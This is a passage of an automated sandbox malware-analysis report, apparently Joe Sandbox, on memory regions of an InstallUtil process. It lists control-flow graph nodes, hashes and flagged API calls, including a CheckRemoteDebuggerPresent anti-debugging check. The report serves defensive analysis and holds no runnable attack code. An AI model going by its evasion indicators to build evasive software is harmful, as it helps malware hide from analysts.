2372->2371 2377 61081c4-61081c7 2374->2377 2378 61081d9-6108212 2374->2378 2376->2346 2384 6107f81-6107f9d 2376->2384 2377->2368 2378->2353 2403 6108214-610821e 2378->2403 2382->2354 2390 610840d-610841c 2383->2390 2391 61082ae-61082cb 2383->2391 2392 6108102-610810e 2384->2392 2393 6107fa3-6107fcd 2384->2393 2390->2382 2390->2383 2391->2390 2404 61082d1-61083c7 call 6106670 2391->2404 2392->2355 2392->2376 2407 6107fd3-6107ffb 2393->2407 2408 61080f8-61080fd 2393->2408 2456 61083d5 2404->2456 2457 61083c9-61083d3 2404->2457 2407->2408 2414 6108001-610802f 2407->2414 2408->2392 2414->2408 2420 6108035-610803e 2414->2420 2420->2408 2421 6108044-6108076 2420->2421 2429 6108081-610809d 2421->2429 2430 6108078-610807c 2421->2430 2429->2392 2431 610809f-61080f6 call 6106670 2429->2431 2430->2408 2432 610807e 2430->2432 2431->2392 2432->2429 2458 61083da-61083dc 2456->2458 2457->2458 2458->2390 2459 61083de-61083e3 2458->2459 2460 61083f1 2459->2460 2461 61083e5-61083ef 2459->2461 2462 61083f6-61083f8 2460->2462 2461->2462 2462->2390 2463 61083fa-6108406 2462->2463 2463->2390
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq
                                                  • API String ID: 0-2695052418
                                                  • Opcode ID: 155234318db92e1383e804a9bb1a85e0f73b7d6c82b60984a83be7c493b0e960
                                                  • Instruction ID: 77859c0061a8fe658581731bfdd50f0cc9c8345932bb0426012243ab81f88bde
                                                  • Opcode Fuzzy Hash: 155234318db92e1383e804a9bb1a85e0f73b7d6c82b60984a83be7c493b0e960
                                                  • Instruction Fuzzy Hash: B902AB30B042059FEF99DB68D9906AEB7B2FF84310F148929E415DB395DB71EC86CB80

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2830 6105258-6105276 2831 6105278-610527b 2830->2831 2832 610527d-6105283 2831->2832 2833 610528e-6105291 2831->2833 2834 6105289 2832->2834 2835 61053ab-61053ae 2832->2835 2836 6105293-61052b2 2833->2836 2837 61052b7-61052ba 2833->2837 2834->2833 2838 61053b3-61053b6 2835->2838 2836->2837 2839 61052bc-61052c2 2837->2839 2840 61052cd-61052d0 2837->2840 2842 61053c0-61053c3 2838->2842 2843 61053b8-61053bb 2838->2843 2844 61052c8 2839->2844 2845 61053ee-61053f8 2839->2845 2846 61052d2-61052db 2840->2846 2847 610530e-6105311 2840->2847 2848 61053c5-61053ce 2842->2848 2849 61053d9-61053dc 2842->2849 2843->2842 2844->2840 2861 61053ff-6105401 2845->2861 2850 61052e1-61052e9 2846->2850 2851 6105442-610546b 2846->2851 2852 6105313-6105329 2847->2852 2853 610532e-6105331 2847->2853 2848->2846 2857 61053d4 2848->2857 2858 61053e9-61053ec 2849->2858 2859 61053de-61053e2 2849->2859 2850->2851 2860 61052ef-61052ff 2850->2860 2878 6105475-6105478 2851->2878 2852->2853 2854 6105333-6105340 2853->2854 2855 6105345-6105348 2853->2855 2854->2855 2863 6105361-6105364 2855->2863 2864 610534a-610535c 2855->2864 2857->2849 2858->2845 2862 6105406-6105409 2858->2862 2866 6105434-6105441 2859->2866 2867 61053e4 2859->2867 2860->2851 2868 6105305-6105309 2860->2868 2861->2862 2870 6105415-6105418 2862->2870 2871 610540b-6105414 2862->2871 2873 6105366-6105375 2863->2873 2874 610537a-610537d 2863->2874 2864->2863 2867->2858 2868->2847 2875 6105422-6105424 2870->2875 2876 610541a-610541d 2870->2876 2873->2874 2874->2839 2879 6105383-6105386 2874->2879 2880 6105426 2875->2880 2881 610542b-610542e 2875->2881 2876->2875 2883 610547a-6105481 2878->2883 2884 610548c-610548f 2878->2884 2885 6105390-6105393 2879->2885 2886 6105388-610538d 2879->2886 2880->2881 2881->2831 2881->2866 2891 6105487 2883->2891 2892 610555a-6105561 2883->2892 2887 61054a0-61054a3 2884->2887 2888 6105491-610549b 2884->2888 2889 61053a1-61053a4 2885->2889 2890 6105395-610539c 2885->2890 2886->2885 2894 61054c5-61054c8 2887->2894 2895 61054a5-61054a9 2887->2895 2888->2887 2889->2848 2893 61053a6-61053a9 2889->2893 2890->2889 2891->2884 2893->2835 2893->2838 2899 61054d2-61054d5 2894->2899 2900 61054ca-61054d1 2894->2900 2897 6105562-610559c 2895->2897 2898 61054af-61054b7 2895->2898 2908 610559e-61055a1 2897->2908 2898->2897 2901 61054bd-61054c0 2898->2901 2902 61054f3-61054f6 2899->2902 2903 61054d7-61054db 2899->2903 2901->2894 2905 6105510-6105513 2902->2905 2906 61054f8-61054fc 2902->2906 2903->2897 2904 61054e1-61054e9 2903->2904 2904->2897 2911 61054eb-61054ee 2904->2911 2909 6105515-6105519 2905->2909 2910 610552d-6105530 2905->2910 2906->2897 2912 61054fe-6105506 2906->2912 2914 61055a3-61055aa 2908->2914 2915 61055af-61055b2 2908->2915 2909->2897 2916 610551b-6105523 2909->2916 2917 6105532-6105543 2910->2917 2918 6105548-610554a 2910->2918 2911->2902 2912->2897 2913 6105508-610550b 2912->2913 2913->2905 2914->2915 2919 61055c0-61055c3 2915->2919 2920 61055b4-61055bb 2915->2920 2916->2897 2921 6105525-6105528 2916->2921 2917->2918 2922 6105551-6105554 2918->2922 2923 610554c 2918->2923 2924 61055c9-610575d 2919->2924 2925 61058ac-61058af 2919->2925 2920->2919 2921->2910 2922->2878 2922->2892 2923->2922 2979 6105763-610576a 2924->2979 2980 6105896-61058a9 2924->2980 2927 61058b1-61058b6 2925->2927 2928 61058b9-61058bc 2925->2928 2927->2928 2928->2924 2929 61058c2-61058c5 2928->2929 2931 61058c7-61058d8 2929->2931 2932 61058df-61058e2 2929->2932 2937 6105905-6105918 2931->2937 2940 61058da 2931->2940 2934 6105900-6105903 2932->2934 2935 61058e4-61058f5 2932->2935 2934->2937 2938 610591b-610591e 2934->2938 2935->2920 2946 61058fb 2935->2946 2938->2924 2939 6105924-6105927 2938->2939 2944 6105945-6105948 2939->2944 2945 6105929-610593a 2939->2945 2940->2932 2947 6105966-6105969 2944->2947 2948 610594a-610595b 2944->2948 2945->2920 2955 6105940 2945->2955 2946->2934 2951 6105987-6105989 2947->2951 2952 610596b-610597c 2947->2952 2948->2920 2960 6105961 2948->2960 2953 6105990-6105993 2951->2953 2954 610598b 2951->2954 2952->2935 2961 6105982 2952->2961 2953->2908 2959 6105999-61059a2 2953->2959 2954->2953 2955->2944 2960->2947 2961->2951 2981 6105770-6105793 2979->2981 2982 610581e-6105825 2979->2982 2991 610579b-61057a3 2981->2991 2982->2980 2984 6105827-610585a 2982->2984 2995 610585c 2984->2995 2996 610585f-610588c 2984->2996 2993 61057a5 2991->2993 2994 61057a8-61057e9 2991->2994 2993->2994 3004 6105801-6105812 2994->3004 3005 61057eb-61057fc 2994->3005 2995->2996 2996->2959 3004->2959 3005->2959
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $
                                                  • API String ID: 0-3993045852
                                                  • Opcode ID: 73360808549d3eaa85d248f995288142f357b684bc43393a6ff4ddc04a93ebf4
                                                  • Instruction ID: c8153dd80483b9f17b86be5764b61067644d738534858bae60bdd94366541dd0
                                                  • Opcode Fuzzy Hash: 73360808549d3eaa85d248f995288142f357b684bc43393a6ff4ddc04a93ebf4
                                                  • Instruction Fuzzy Hash: 8322AF75E002199BEF64DBA4C6406AEBBB3FF88320F24856AD405AB394DB71DC41CF90
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00BC7127
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3315392519.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_bc0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: 8cffd1fcd60010fd19608c60d41e2e556ae2deb660d08f9ecedef83678db7882
                                                  • Instruction ID: 7ee3f7f6c29ea12417a90a1200a3e2e436b447b24de0b52fdfc3d6056edd963c
                                                  • Opcode Fuzzy Hash: 8cffd1fcd60010fd19608c60d41e2e556ae2deb660d08f9ecedef83678db7882
                                                  • Instruction Fuzzy Hash: 8B2128B68002598FCB10CF9AD884BEEFBF4EF49310F14845AE455B3251D778A944CF61
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4c6d1aa37ffc835d149a9c99a6312610cac7106cf717b84d48d96625ac96c61
                                                  • Instruction ID: d6d0dda5dd3b0b9d780d21c68a026c5841d59f3d853ff9137b7ec50200a3202a
                                                  • Opcode Fuzzy Hash: e4c6d1aa37ffc835d149a9c99a6312610cac7106cf717b84d48d96625ac96c61
                                                  • Instruction Fuzzy Hash: 6562AC34A002048FEF55DB68D594BAEB7F2EF88310F248869E406DB395DB75ED52CB90
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4673fa238197d435355a60488de47dabcbc9b3121041f541363e41a7bf455f1
                                                  • Instruction ID: 4ed4761a1d1f56243714b18336bffec712737d76c55a7c212a04fff0f59257d9
                                                  • Opcode Fuzzy Hash: a4673fa238197d435355a60488de47dabcbc9b3121041f541363e41a7bf455f1
                                                  • Instruction Fuzzy Hash: 32326E74B102059FEF55DB68D980BAEB7B2FB88310F108A29E405EB395DB75DC428F91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 526 610ad98-610adb6 527 610adb8-610adbb 526->527 528 610adbd-610add9 527->528 529 610adde-610ade1 527->529 528->529 530 610ade3-610ade8 529->530 531 610adeb-610adee 529->531 530->531 533 610adf4-610adf7 531->533 534 610afb5-610afbe 531->534 537 610adf9-610ae06 533->537 538 610ae0b-610ae0e 533->538 535 610ae41-610ae4a 534->535 536 610afc4-610afce 534->536 540 610ae50-610ae54 535->540 541 610afcf-610afe1 535->541 537->538 542 610ae10-610ae23 538->542 543 610ae28-610ae2b 538->543 546 610ae59-610ae5c 540->546 553 610afe3-610afea 541->553 554 610afeb-610b006 541->554 542->543 544 610ae3c-610ae3f 543->544 545 610ae2d-610ae31 543->545 544->535 544->546 545->536 549 610ae37 545->549 551 610ae6c-610ae6e 546->551 552 610ae5e-610ae67 546->552 549->544 555 610ae70 551->555 556 610ae75-610ae78 551->556 552->551 553->554 557 610b008-610b00b 554->557 555->556 556->527 558 610ae7e-610aea2 556->558 559 610b01a-610b01d 557->559 560 610b00d 557->560 572 610afb2 558->572 573 610aea8-610aeb7 558->573 561 610b02a-610b02d 559->561 562 610b01f-610b023 559->562 651 610b00d call 610b2f0 560->651 652 610b00d call 610b300 560->652 566 610b050-610b053 561->566 567 610b02f-610b04b 561->567 564 610b025 562->564 565 610b069-610b0a4 562->565 564->561 579 610b297-610b2aa 565->579 580 610b0aa-610b0b6 565->580 570 610b060-610b063 566->570 571 610b055-610b05f 566->571 567->566 568 610b013-610b015 568->559 570->565 575 610b2cc-610b2ce 570->575 572->534 585 610aeb9-610aebf 573->585 586 610aecf-610af0a call 6106670 573->586 577 610b2d0 575->577 578 610b2d5-610b2d8 575->578 577->578 578->557 581 610b2de-610b2e8 578->581 584 610b2ac 579->584 590 610b0d6-610b11a 580->590 591 610b0b8-610b0d1 580->591 584->575 588 610aec1 585->588 589 610aec3-610aec5 585->589 602 610af22-610af39 586->602 603 610af0c-610af12 586->603 588->586 589->586 607 610b136-610b175 590->607 608 610b11c-610b12e 590->608 591->584 616 610af51-610af62 602->616 617 610af3b-610af41 602->617 605 610af14 603->605 606 610af16-610af18 603->606 605->602 606->602 612 610b17b-610b256 call 6106670 607->612 613 610b25c-610b271 607->613 608->607 612->613 613->579 624 610af64-610af6a 616->624 625 610af7a-610afab 616->625 620 610af43 617->620 621 610af45-610af47 617->621 620->616 621->616 627 610af6c 624->627 628 610af6e-610af70 624->628 625->572 627->625 628->625 651->568 652->568
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                  • API String ID: 0-3377385791
                                                  • Opcode ID: 4f1c8d713d8fd2c2c435bed72ef5ad219ca02e1770dc701fc931d5278aadd742
                                                  • Instruction ID: 1994e64cf858928d3db514b8ad51263840be296990dbc2c696edf876dd5e2c94
                                                  • Opcode Fuzzy Hash: 4f1c8d713d8fd2c2c435bed72ef5ad219ca02e1770dc701fc931d5278aadd742
                                                  • Instruction Fuzzy Hash: 38E17030E102098FEF55DF69D5906AEB7B6FF85300F508929E405EB396DBB1AC42CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1383 60f6e08-60f6ea7 GetCurrentProcess 1388 60f6ea9-60f6eaf 1383->1388 1389 60f6eb0-60f6ee4 GetCurrentThread 1383->1389 1388->1389 1390 60f6eed-60f6f21 GetCurrentProcess 1389->1390 1391 60f6ee6-60f6eec 1389->1391 1392 60f6f2a-60f6f45 call 60f6fe8 1390->1392 1393 60f6f23-60f6f29 1390->1393 1391->1390 1397 60f6f4b-60f6f7a GetCurrentThreadId 1392->1397 1393->1392 1398 60f6f7c-60f6f82 1397->1398 1399 60f6f83-60f6fe5 1397->1399 1398->1399
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 060F6E96
                                                  • GetCurrentThread.KERNEL32 ref: 060F6ED3
                                                  • GetCurrentProcess.KERNEL32 ref: 060F6F10
                                                  • GetCurrentThreadId.KERNEL32 ref: 060F6F69
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 828d06024d4e555882184875b45662def1713fdc388f4f638f95a89a964ae2a9
                                                  • Instruction ID: 22a718a3a244b00b70ef2e4548299f228d2ba1ff3de4df91cc1f792ba05e6d67
                                                  • Opcode Fuzzy Hash: 828d06024d4e555882184875b45662def1713fdc388f4f638f95a89a964ae2a9
                                                  • Instruction Fuzzy Hash: A15174B19103098FDB54CFA9D948B9EBFF1EF88310F20845AE109AB3A1D7756984CB25

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1406 60f6e18-60f6ea7 GetCurrentProcess 1410 60f6ea9-60f6eaf 1406->1410 1411 60f6eb0-60f6ee4 GetCurrentThread 1406->1411 1410->1411 1412 60f6eed-60f6f21 GetCurrentProcess 1411->1412 1413 60f6ee6-60f6eec 1411->1413 1414 60f6f2a-60f6f45 call 60f6fe8 1412->1414 1415 60f6f23-60f6f29 1412->1415 1413->1412 1419 60f6f4b-60f6f7a GetCurrentThreadId 1414->1419 1415->1414 1420 60f6f7c-60f6f82 1419->1420 1421 60f6f83-60f6fe5 1419->1421 1420->1421
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 060F6E96
                                                  • GetCurrentThread.KERNEL32 ref: 060F6ED3
                                                  • GetCurrentProcess.KERNEL32 ref: 060F6F10
                                                  • GetCurrentThreadId.KERNEL32 ref: 060F6F69
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 2202980db375293e7718ce4163e13d5809ec57bc0ec2f563d38088a1e390d82f
                                                  • Instruction ID: e287a6a0b2344c34ad476677702c834faf243ccdc42ee735149d39fe69c9e500
                                                  • Opcode Fuzzy Hash: 2202980db375293e7718ce4163e13d5809ec57bc0ec2f563d38088a1e390d82f
                                                  • Instruction Fuzzy Hash: 8C5165B19102098FDB54CFAAD948B9EBFF1EF88310F208459E509A7390D7756944CB25

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1428 6109218-610923d 1429 610923f-6109242 1428->1429 1430 6109244-6109263 1429->1430 1431 6109268-610926b 1429->1431 1430->1431 1432 6109271-6109286 1431->1432 1433 6109b2b-6109b2d 1431->1433 1440 6109288-610928e 1432->1440 1441 610929e-61092b4 1432->1441 1435 6109b34-6109b37 1433->1435 1436 6109b2f 1433->1436 1435->1429 1438 6109b3d-6109b47 1435->1438 1436->1435 1442 6109290 1440->1442 1443 6109292-6109294 1440->1443 1445 61092bf-61092c1 1441->1445 1442->1441 1443->1441 1446 61092c3-61092c9 1445->1446 1447 61092d9-610934a 1445->1447 1448 61092cb 1446->1448 1449 61092cd-61092cf 1446->1449 1458 6109376-6109392 1447->1458 1459 610934c-610936f 1447->1459 1448->1447 1449->1447 1464 6109394-61093b7 1458->1464 1465 61093be-61093d9 1458->1465 1459->1458 1464->1465 1470 6109404-610941f 1465->1470 1471 61093db-61093fd 1465->1471 1476 6109421-6109443 1470->1476 1477 610944a-6109454 1470->1477 1471->1470 1476->1477 1478 6109464-61094de 1477->1478 1479 6109456-610945f 1477->1479 1485 61094e0-61094fe 1478->1485 1486 610952b-6109540 1478->1486 1479->1438 1490 6109500-610950f 1485->1490 1491 610951a-6109529 1485->1491 1486->1433 1490->1491 1491->1485 1491->1486
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq$$cq$$cq
                                                  • API String ID: 0-2876200767
                                                  • Opcode ID: 158054fc46a4873cf68f2acc35aac18234db56a92ceae76242868c04dbdf4b3d
                                                  • Instruction ID: a7fb76ae913424d351a60edabb09f4f95b0fd8c9248594aaf5662d2b5623b3e5
                                                  • Opcode Fuzzy Hash: 158054fc46a4873cf68f2acc35aac18234db56a92ceae76242868c04dbdf4b3d
                                                  • Instruction Fuzzy Hash: 12915234B0060A8FEF55DB65D9607AF73B6EFC4200F108969D809EB399EF719D428B91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1494 610d018-610d033 1495 610d035-610d038 1494->1495 1496 610d081-610d084 1495->1496 1497 610d03a-610d07c 1495->1497 1498 610d093-610d096 1496->1498 1499 610d086-610d088 1496->1499 1497->1496 1502 610d098-610d0da 1498->1502 1503 610d0df-610d0e2 1498->1503 1500 610d4fd 1499->1500 1501 610d08e 1499->1501 1505 610d500-610d50c 1500->1505 1501->1498 1502->1503 1506 610d0e4-610d100 1503->1506 1507 610d105-610d108 1503->1507 1508 610d512-610d7ff 1505->1508 1509 610d29c-610d2ab 1505->1509 1506->1507 1510 610d151-610d154 1507->1510 1511 610d10a-610d14c 1507->1511 1706 610d805-610d80b 1508->1706 1707 610da26-610da30 1508->1707 1514 610d2ba-610d2c6 1509->1514 1515 610d2ad-610d2b2 1509->1515 1517 610d156-610d198 1510->1517 1518 610d19d-610d1a0 1510->1518 1511->1510 1522 610da31-610da66 1514->1522 1523 610d2cc-610d2de 1514->1523 1515->1514 1517->1518 1519 610d1a2-610d1a7 1518->1519 1520 610d1aa-610d1ad 1518->1520 1519->1520 1520->1505 1527 610d1b3-610d1b6 1520->1527 1538 610da68-610da6b 1522->1538 1540 610d2e3-610d2e6 1523->1540 1531 610d1b8-610d1fa 1527->1531 1532 610d1ff-610d202 1527->1532 1531->1532 1541 610d204-610d246 1532->1541 1542 610d24b-610d24e 1532->1542 1544 610da6d-610da89 1538->1544 1545 610da8e-610da91 1538->1545 1548 610d2e8-610d32a 1540->1548 1549 610d32f-610d332 1540->1549 1541->1542 1550 610d250-610d25f 1542->1550 1551 610d297-610d29a 1542->1551 1544->1545 1560 610daa0-610daa3 1545->1560 1561 610da93 1545->1561 1548->1549 1555 610d334-610d34a 1549->1555 1556 610d34f-610d352 1549->1556 1558 610d261-610d266 1550->1558 1559 610d26e-610d27a 1550->1559 1551->1509 1551->1540 1555->1556 1563 610d354-610d396 1556->1563 1564 610d39b-610d39e 1556->1564 1558->1559 1559->1522 1565 610d280-610d292 1559->1565 1571 610daa5-610dad1 1560->1571 1572 610dad6-610dad8 1560->1572 1753 610da93 call 610db85 1561->1753 1754 610da93 call 610db98 1561->1754 1563->1564 1578 610d3a0-610d3a2 1564->1578 1579 610d3a9-610d3ab 1564->1579 1565->1551 1571->1572 1573 610dada 1572->1573 1574 610dadf-610dae2 1572->1574 1573->1574 1574->1538 1581 610dae4-610daf3 1574->1581 1587 610d3a4 1578->1587 1588 610d3bb-610d3c4 1578->1588 1589 610d3b2-610d3b5 1579->1589 1590 610d3ad 1579->1590 1580 610da99-610da9b 1580->1560 1605 610daf5-610db58 call 6106670 1581->1605 1606 610db5a-610db6f 1581->1606 1587->1579 1596 610d3d3-610d3df 1588->1596 1597 610d3c6-610d3cb 1588->1597 1589->1495 1589->1588 1590->1589 1599 610d4f0-610d4f5 1596->1599 1600 610d3e5-610d3f9 1596->1600 1597->1596 1599->1500 1600->1500 1615 610d3ff-610d411 1600->1615 1605->1606 1625 610d413-610d419 1615->1625 1626 610d435-610d437 1615->1626 1628 610d41b 1625->1628 1629 610d41d-610d429 1625->1629 1633 610d441-610d44d 1626->1633 1632 610d42b-610d433 1628->1632 1629->1632 1632->1633 1640 610d45b 1633->1640 1641 610d44f-610d459 1633->1641 1643 610d460-610d462 1640->1643 1641->1643 1643->1500 1645 610d468-610d484 call 6106670 1643->1645 1654 610d493-610d49f 1645->1654 1655 610d486-610d48b 1645->1655 1654->1599 1656 610d4a1-610d4ee 1654->1656 1655->1654 1656->1500 1708 610d81a-610d823 1706->1708 1709 610d80d-610d812 1706->1709 1708->1522 1710 610d829-610d83c 1708->1710 1709->1708 1712 610d842-610d848 1710->1712 1713 610da16-610da20 1710->1713 1714 610d857-610d860 1712->1714 1715 610d84a-610d84f 1712->1715 1713->1706 1713->1707 1714->1522 1716 610d866-610d887 1714->1716 1715->1714 1719 610d896-610d89f 1716->1719 1720 610d889-610d88e 1716->1720 1719->1522 1721 610d8a5-610d8c2 1719->1721 1720->1719 1721->1713 1724 610d8c8-610d8ce 1721->1724 1724->1522 1725 610d8d4-610d8ed 1724->1725 1727 610d8f3-610d91a 1725->1727 1728 610da09-610da10 1725->1728 1727->1522 1731 610d920-610d92a 1727->1731 1728->1713 1728->1724 1731->1522 1732 610d930-610d947 1731->1732 1734 610d956-610d971 1732->1734 1735 610d949-610d954 1732->1735 1734->1728 1740 610d977-610d990 call 6106670 1734->1740 1735->1734 1744 610d992-610d997 1740->1744 1745 610d99f-610d9a8 1740->1745 1744->1745 1745->1522 1746 610d9ae-610da02 1745->1746 1746->1728 1753->1580 1754->1580
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq$$cq
                                                  • API String ID: 0-2085107096
                                                  • Opcode ID: 8ef7f18c8740cc7d56a6662ab1627aef8a1808477c7400a2b591490650ad4660
                                                  • Instruction ID: 2c7ae8917e180aff2175b54cce1f1dc6eda91c5072b52b3964231e83b23dc7c7
                                                  • Opcode Fuzzy Hash: 8ef7f18c8740cc7d56a6662ab1627aef8a1808477c7400a2b591490650ad4660
                                                  • Instruction Fuzzy Hash: 34624D30A00606CFDF55EF68E590A5EB7B2FF84304B608A69E4059F369DB75ED46CB80

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1755 6104820-6104844 1756 6104846-6104849 1755->1756 1757 6104f28-6104f2b 1756->1757 1758 610484f-6104947 1756->1758 1759 6104f4c-6104f4e 1757->1759 1760 6104f2d-6104f47 1757->1760 1778 61049ca-61049d1 1758->1778 1779 610494d-6104995 1758->1779 1761 6104f50 1759->1761 1762 6104f55-6104f58 1759->1762 1760->1759 1761->1762 1762->1756 1765 6104f5e-6104f6b 1762->1765 1780 6104a55-6104a5e 1778->1780 1781 61049d7-6104a47 1778->1781 1801 610499a call 61050d8 1779->1801 1802 610499a call 61050c8 1779->1802 1780->1765 1798 6104a52 1781->1798 1799 6104a49 1781->1799 1792 61049a0-61049bc 1796 61049c7-61049c8 1792->1796 1797 61049be 1792->1797 1796->1778 1797->1796 1798->1780 1799->1798 1801->1792 1802->1792
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fhq$XPhq$\Ohq
                                                  • API String ID: 0-1165799323
                                                  • Opcode ID: 5a5f1dc71b24586db618a4997db44b27efe788397462a89720ccec5f5c6892ac
                                                  • Instruction ID: 0597eec98544c8be1008fe829afaa1305f0acfc6dc780229d005fd1d8239fa7c
                                                  • Opcode Fuzzy Hash: 5a5f1dc71b24586db618a4997db44b27efe788397462a89720ccec5f5c6892ac
                                                  • Instruction Fuzzy Hash: F8615C31F002199FEF549FA5C9547AEBAF6FB88300F20842AE10AAB3D5DF714D058B91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2762 6109208-610920c 2763 610926e-6109279 2762->2763 2764 610920e-610923d 2762->2764 2765 6109284-6109286 2763->2765 2766 610923f-6109242 2764->2766 2769 6109288-610928e 2765->2769 2770 610929e-61092b4 2765->2770 2767 6109244-6109263 2766->2767 2768 6109268-610926b 2766->2768 2767->2768 2771 6109271-6109279 2768->2771 2772 6109b2b-6109b2d 2768->2772 2773 6109290 2769->2773 2774 6109292-6109294 2769->2774 2780 61092bf-61092c1 2770->2780 2771->2765 2777 6109b34-6109b37 2772->2777 2778 6109b2f 2772->2778 2773->2770 2774->2770 2777->2766 2779 6109b3d-6109b47 2777->2779 2778->2777 2782 61092c3-61092c9 2780->2782 2783 61092d9-610934a 2780->2783 2784 61092cb 2782->2784 2785 61092cd-61092cf 2782->2785 2794 6109376-6109392 2783->2794 2795 610934c-610936f 2783->2795 2784->2783 2785->2783 2800 6109394-61093b7 2794->2800 2801 61093be-61093d9 2794->2801 2795->2794 2800->2801 2806 6109404-610941f 2801->2806 2807 61093db-61093fd 2801->2807 2812 6109421-6109443 2806->2812 2813 610944a-6109454 2806->2813 2807->2806 2812->2813 2814 6109464-61094de 2813->2814 2815 6109456-610945f 2813->2815 2821 61094e0-61094fe 2814->2821 2822 610952b-6109540 2814->2822 2815->2779 2826 6109500-610950f 2821->2826 2827 610951a-6109529 2821->2827 2822->2772 2826->2827 2827->2821 2827->2822
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq
                                                  • API String ID: 0-2695052418
                                                  • Opcode ID: 16e40145f901578a7b960890de7efef2e5cc46b4001fc767d49e94663e25a981
                                                  • Instruction ID: bf5e67594385d7074a924b854c9fdbc94d5b10e073307d2ee6b6b5a558498c06
                                                  • Opcode Fuzzy Hash: 16e40145f901578a7b960890de7efef2e5cc46b4001fc767d49e94663e25a981
                                                  • Instruction Fuzzy Hash: 19515E34B001059FEF55EB78D9607AF77B6EBC4200F148969D80ADB399EB719C428B91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
